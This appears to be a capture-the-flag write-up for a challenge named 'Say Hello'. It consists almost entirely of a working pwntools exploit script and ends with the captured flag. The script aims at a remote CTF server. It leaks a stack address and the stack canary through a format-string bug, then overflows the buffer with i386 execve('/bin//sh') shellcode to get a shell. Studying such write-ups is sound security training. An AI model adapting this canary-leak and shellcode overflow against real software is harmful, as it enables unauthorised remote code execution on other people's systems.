
Say Hello

  • Technique: Shellcode

Script

from pwn import *

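# ---------------------------------------------------------------------------
# Target selection.  With no arguments the script behaves exactly as before
# and connects to the CTF server; the pwntools `args` switches replace the
# commented-out local/gdb lines:
#   python3 exploit.py LOCAL        -> run ./say_hello as a local process
#   python3 exploit.py LOCAL GDB    -> same, under gdb with the old breakpoint
#   python3 exploit.py HOST=... PORT=...  -> a different remote
# ---------------------------------------------------------------------------
HOST = args.HOST or '3.1.147.170'
PORT = int(args.PORT or 10010)

# context.binary also sets arch/bits (i386 here, see the shellcode below) for
# p32()/asm().
elf = context.binary = ELF('./say_hello')

if args.GDB:
    r = gdb.debug("./say_hello", gdbscript='''b*main+280''')
elif args.LOCAL:
    r = elf.process()
else:
    r = remote(HOST, PORT)

# ---------------------------------------------------------------------------
# Leak 1: the binary prints the address of its stack buffer ("buffer : 0x...").
# That is where the shellcode will land, so it doubles as the return address.
# ---------------------------------------------------------------------------
r.recvuntil(b'buffer : ')
buffer = int(r.recvuntil(b'\n', drop=True), 16)
log.info(f'leaked buf addr: {hex(buffer)}')

# ---------------------------------------------------------------------------
# Leak 2: the stack canary, through the format-string bug behind menu option 1.
# '%1$p' prints the first vararg slot of the printf call; the slot index is
# specific to this binary, so re-check it in gdb if the value looks wrong.
# ---------------------------------------------------------------------------
r.sendline(b'1')
r.sendline(b'%1$p')
r.sendline(b'2')
r.recvuntil(b'Hello ')
raw = r.recvuntil(b'\n', drop=True).decode()
try:
    canary = int(raw, 16)
except ValueError:
    # e.g. "(nil)" - the format string hit a NULL slot, so the offset is wrong.
    # log.error() raises, so the script stops here instead of sending garbage.
    log.error(f'unexpected format-string output {raw!r}; check the %N$p offset')
log.info(f'leaked canary: {hex(canary)}')
# glibc keeps the least significant byte of the canary 0x00 so string
# functions stop on it; a non-zero low byte almost always means we leaked a
# neighbouring slot instead of the canary.
if canary & 0xff:
    log.warning(f'canary low byte is not 0x00 ({hex(canary)}) - wrong %N$p offset?')

# ---------------------------------------------------------------------------
# Payload.
# 21-byte i386 execve("/bin//sh", NULL, NULL):
#   push 0xb ; pop eax ; cdq ; push edx ; push "//sh" ; push "/bin"
#   mov ebx, esp ; xor ecx, ecx ; int 0x80
# Hard-coded instead of asm(shellcraft.sh()) so the script does not need an
# i386 binutils toolchain; shellcraft.sh() is the equivalent if you have one.
# ---------------------------------------------------------------------------
shellcode = b"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

# Bytes from the start of the buffer up to the canary.  A negative multiplier
# would silently yield b'' and shift the canary, so fail loudly instead.
BUF_TO_CANARY = 32
if len(shellcode) > BUF_TO_CANARY:
    log.error(f'shellcode is {len(shellcode)} bytes, only {BUF_TO_CANARY} fit before the canary')
padding = b'\x90' * (BUF_TO_CANARY - len(shellcode))

# Stack layout the payload reproduces (offsets as used by the original exploit):
#   [ 32 bytes: shellcode + NOP fill ][ canary ][ 8 bytes ][ return address ]
# The 8 filler bytes cover the saved ebp plus one more 4-byte slot (presumably
# a saved register or alignment padding - not recoverable from here).  The
# return address is the leaked buffer itself, i.e. execution lands on the
# shellcode; that only works when the stack is executable (NX disabled).
payload = shellcode + padding + p32(canary) + b'B' * 8 + p32(buffer)

# A 0x0a byte inside the packed canary/address would truncate the line if the
# target reads it with gets()/fgets(); warn rather than wonder why it failed.
if b'\n' in payload:
    log.warning('payload contains a newline byte; a line-based read on the target will cut it short')

r.sendline(b'3')
r.sendline(payload)
r.interactive()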

Flag

CDDC2024{TH1S_1S_MY_RE4L_N4ME}